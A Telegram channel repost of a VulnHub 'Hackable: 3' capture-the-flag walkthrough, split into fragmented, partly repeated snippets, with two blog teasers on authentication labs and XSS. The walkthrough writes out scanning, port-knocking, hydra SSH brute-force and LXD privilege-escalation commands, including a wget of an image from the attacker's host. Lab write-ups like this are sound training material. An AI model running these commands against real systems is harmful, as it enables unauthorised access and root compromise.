Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Hackable: 3 VulnHub Walkthrough

Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to put their abilities to the test. We used the machine in the way that it was designed. Also, if you haven't checked the machine or are having problems, you can attempt every approach you know. The key is port knocking, so let's get started and discover how to split things down into digestible chunks. Pentesting Methodology● netdiscover● nmap● abusing http● dirb● wordlist● port knocking● hydra● ssh● user flag● linpeas● lxd● root flagTo begin with, we must use the netdiscovercommand to scan the network for the IP address of the victim machine.netdiscoverOur IP address is 192.168.1.185.Nmap. For open port enumeration.nmap -sC -sV 192.168.1.185According to Nmap, we have an SSH server operating on port 22 and an HTTP service (Apache Server) running on port 80.EnumerationFirst, we'll attempt to use HTTP. Let's look at port 80 and see if anything interesting comes up. We can immediately verify it in the browser because the Apache Server is listening on port 80.login page."jubiscleudo."port knocking.https://blogger.googleusercontent.com/img/a/AVvXsEg5dzsOwH__RbupQ-l5c033EKAS_KlSorzXpRQYECF8Eu_baDuetC0dNVN8i-FkHx5Njequkd9FpqRTWARIhskPJ1ECZnUhTNVepG5p4F5jVZ_HVMkFEp69kUsQ5xn1LKuETe12MLy_Upb07rw-TNhmosHSMiRzofKOMYwUDLtNfqnJZ6sy5iXcKDy9hQ=s16000 To find out more about this laboratory. To uncover certain hidden directory paths, we execute a dirb directory scan.dirb http://192.168.1.185/Let's look through a lot of trustworthy directories, so let's look through them one by one.backup directory. We obtained a word list filethat might be valuable in the future.___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Hackable: 3 VulnHub Walkthrough Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to put their abilities to the test. We…
Et8HFO_L73m-3Hlrfsirm6mGHgodJMq6kdbquTCas_3HX6ylII__nhO3j8i6h_ZJCTIqSpZRMMfPrlPCXWDggT5tIg=s16000 As a result, we run the wget command to download this word list to our machine.wget http://192.168.1.185/backup/wordlist.txthttps://blogger.googleusercontent.com/img/a/AVvXsEhLZM499xBUbcE72tbHdXo13bTYS-wE5Zd0gsAIK-8ZCfiIBS26gyQHinfoNxv2h_HKXd7ILA1j9OehSYdyCZKy8SqfsdLEpOkZ7tMbAyKwy8mTma2zPNnuno-ljdlS1YMvUm7Tdags5PAenN-FQOY2GRY4oM4HOaABmZ5gJq-ougO2PyJ7CnlvZhVtag=s16000 Let's look at the second config directory; we found a file called 1.txt. We ran this file through the browser and discovered some essential but mysterious context.decode this text using the following command.We received our first text of port knockingafter recovering the initial text (10000).echo MTAwMDA= | base64 -dhttps://blogger.googleusercontent.com/img/a/AVvXsEgonhSm44bJZc5fmvbpi7g0RqmAaT9UjwllWkObLO-EALHuV89yRKLUcvcQLbsYJa-HBFm4Lj2nAVgj17ibVlY3gh4gbNn5nSWhr8UxDsF9DI346MFJTiTqJBFRri4noWeSblQlQ_D5oPb6vWtTwTLYZHPvChQz-Ci0HDMIBSS5wcLP5W2qmoiLx-Z8cg=s16000 When we checked the third one (css directory), we got another text file called 2.txt. where we obtained an enumeration of brain fucks.4444) of port knocking activity by providing them with our text.: 10000 and 4444. Remember that we obtained a link to a login page earlier? We immediately checked that URL but found nothing interesting. So, we looked at the source code. We found an image called 3.jpgthat might provide some insight into the problem.steghide,which could be useful in certain situations. For our image file, we now provide the steghide tool. Hurray!! We received a top-secret text file.steghide extract -sf 3.jpgTo explore this file, we use the catcommand. Congratulations!! 65535is our third context of port knocking.cat steganopayload48505.txthttps://blogger.googleusercontent.com/img/a/AVvXsEgaW5gIjfhX1cFYtylI_IZle-QWiOcUq0ZjjPaZfIsOfOyi1wXaD7CjMPD79HZvGjaSVQrAq8umJDyyFyaGjWnDt0cdEfB3B4QrUWMBkMvnNiHKndrEvm7WkjY_LxKmpumvoNWQRbg0GVBwjCYVhqtL7o5fPk07bjfFR_RM3CgOZExn9VdKUNGEL7-DVw=s16000 We're now ready to perform port knocking. We're good to go if we use this command in conjunction with our context.knock 192.168.1.185 10000 4444 65535We run an nmapsc[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Et8HFO_L73m-3Hlrfsirm6mGHgodJMq6kdbquTCas_3HX6ylII__nhO3j8i6h_ZJCTIqSpZRMMfPrlPCXWDggT5tIg=s16000 As a result, we run the wget command to download this word list to our machine.wget http://192.168.1.185/backup/wordlist.txthttps://blogger.googleusercontent…
an after port knocking to see what results we get. As you can see, the sshport has been opened.nmap -sV 192.168.1.185https://blogger.googleusercontent.com/img/a/AVvXsEj4XJ8il2EhcF72wFhFketOyAtyYJDbwGmqFUyR-5wPOH3b4qu2f7W0XDWYvm_cKHxElmiz2qXLtLiUaj1eurO6B6RH7ylPby9gfRz9eAkdnshBsNjQ_XW38_i8uN_9UvjpCiEJVRH366AJVxd8P4_Z-3B3Da_sqwJ5KflFSgOxUAVbjdnS-aPfX_p0eg=s16000 ExploitationNow we're ready to attempt exploitation using the information we gained from previous outcomes, including a user name gained from source code. Let's try a brute force attack with the word list we stored for later.hydratool to begin a brute force attack. Bingo!! We have a username (jubiscleudo) and a password (onlymy).hydra -l jubiscleudo -P wordlist.txt 192.168.1.185 sshhttps://blogger.googleusercontent.com/img/a/AVvXsEgRiTvTej74I9DIgtAF81tYZ5f0SrrJgAerLXU4-SWzKPsuhoEW6-cqVdlHslGjRppt9DHGD_Mpkr1IfYs969Vw8eIdZ4PrmGvE3thomXDeWWh2KXYrbN5vDb4-y70C09ZVDjQPcztgrTvYi1NoKzRosqeJm-X6fIoBfmG1OsaA4hcwUzhvCbdAyRwk3w=s16000 Now let's use the credentials we received from the brute-force attack to log into ssh. Hurray!! The user jubiscleudowas successfully logged in. We instantly examined its id, then used the cat command to reveal the hidden user flag.ssh jubiscleudo@192.168.1.185https://blogger.googleusercontent.com/img/a/AVvXsEjJw9wksN1n69ofidQ1f6ZtZz-Is2sGg0r5x7pl4hJxHTFFGm-vK7VCFZapsY-u7LhoCHeVqvUMMCq37SVk3zF0dw88qwZ76ZhqUDJjnqjBorSmdC8bqqtKBj00_gf77W_qPkg47icXFM3zc_zlwtgnIvixTh3Ysk8fDNtxfTptLWtxMfsLUZxpgkom4w=s16000 After all of this, we require another clue in order to get further into this machine. As a result, we employ the linpeas script to uncover some more buried data. More information about this script may be found here.Privilege EscalationLet's get this party started by changing the user to hackable_3. Then, after checking its user id, we discovered that it was potentially vulnerable to lxd. As a result, we can use lxd privilege escalationto gain root access.su hackable_3https://blogger.googleusercontent.com/img/a/AVvXsEjbosxw5QOudklWRdOZLYF7JmnxHjjiYn2qgjHgRuc5-Caaf2L-escvcbyDiNKmRhDwbV9KJ_Dhy_WIeIhJbrZP3yYIz64j5P5Y-S8_l2-wOeCZBjC1uQC7HIm_9lqkZPzBytQfLBQ3gK9lIJQJF7tGTSTdCEg-oka8KCXrALq9tMbtisWlVSHuoYOlkA=s16000 Privilege escalation via lxdnecessitates the use of a local account, which we already have. To escalate the root privileges of the host system, we must first generate an image for lxd, which requires the following steps:Steps must be taken on the host machine are as follows:● Take a look at the alpine image./root directory.reference of our article from here.git clone  https://github.com/saghul/lxd-alpine-builder.gita simple python http serverto transfer this file to the victim's machine. On t[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
an after port knocking to see what results we get. As you can see, the sshport has been opened.nmap -sV 192.168.1.185https://blogger.googleusercontent.com/img/a/AVvXsEj4XJ8il2EhcF72wFhFketOyAtyYJDbwGmqFUyR-5wPOH3b4qu2f7W0XDWYvm_cKHxElmiz2qXLtLiUaj1eurO6B6…
he other hand, we will download the alpine-image to the victim machine's /tmpdirectory.wget 192.168.1.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gzAfter the image has been created, it may be added to LXDas an imageas follows:lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimageUse the list command to check the listof images.lxc image listhttps://blogger.googleusercontent.com/img/a/AVvXsEg4njfsqOVgdjRK4nlzgsUF9hcJ_ZHKn66CTJ34ujdtAQ6bvt1A3XIjV_7GzvlkqgSBa9EdGge0yMyPbn274fDuvKlecAB26wHXjUZOL5jx6Lu5UNSt13_qPmu6IIV1ufMI9ruJFzaL3Sg5YVdPzzBQQGXevxqixX5vwU4FNC14WMkSwrHV4XAwO5YFaw=s16000 We receive an error message stating that we do not have a storage pool. As a result, we must create one. We can use default settings in this case.lxd initAfter that, I proceeded as follows, continuing from the previous failed step.lxc init myimage ignite -c security.privileged=trueNavigate to /mnt/root to see all resources from the host machine once inside the container.cat root.txthttps://blogger.googleusercontent.com/img/a/AVvXsEgdJsfKy-vsLrCL5ZtCpwViXDPpGOwS0b_ADX5q_h9wWJUzRXb_yn0OVMcPEZ_bMuNGqX0NsW7R3C4NmAg06GpTrWK4N0lNzjXZwRx58vj7Ldilr8RNfp66kVpP1yuU_ARVFIXubZkST_zUrmbSiRRZvnZBpypHOVhZBaTFMe-pmf30vAm5iNxBS2myJQ=s16000 This was an excellent lab with a lot of information, particularly in the enumeration and privilege escalation sections. It is worthwhile to try to obtain some CTF experience. Hopefully, you guys will learn something new from this walkthrough.Author: Shubham Sharma is a passionate Cybersecurity Researcher, contact LinkedInand Twitter.___________________________
@hacking_Attack
@Hacking_Video
PORTSWIGGER WEB SECURITY - AUTHENTICATION LAB ÇÖZÜMLERİ

Web uygulamalarının en önemli parçalarından biri olan Authentication, belirli bir kullanıcı veya istemcinin kimliğini doğrulama işlemidir…Continue reading on Medium »
Read more...
XYZ of XSS

Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would…Continue reading on Medium »
Read more...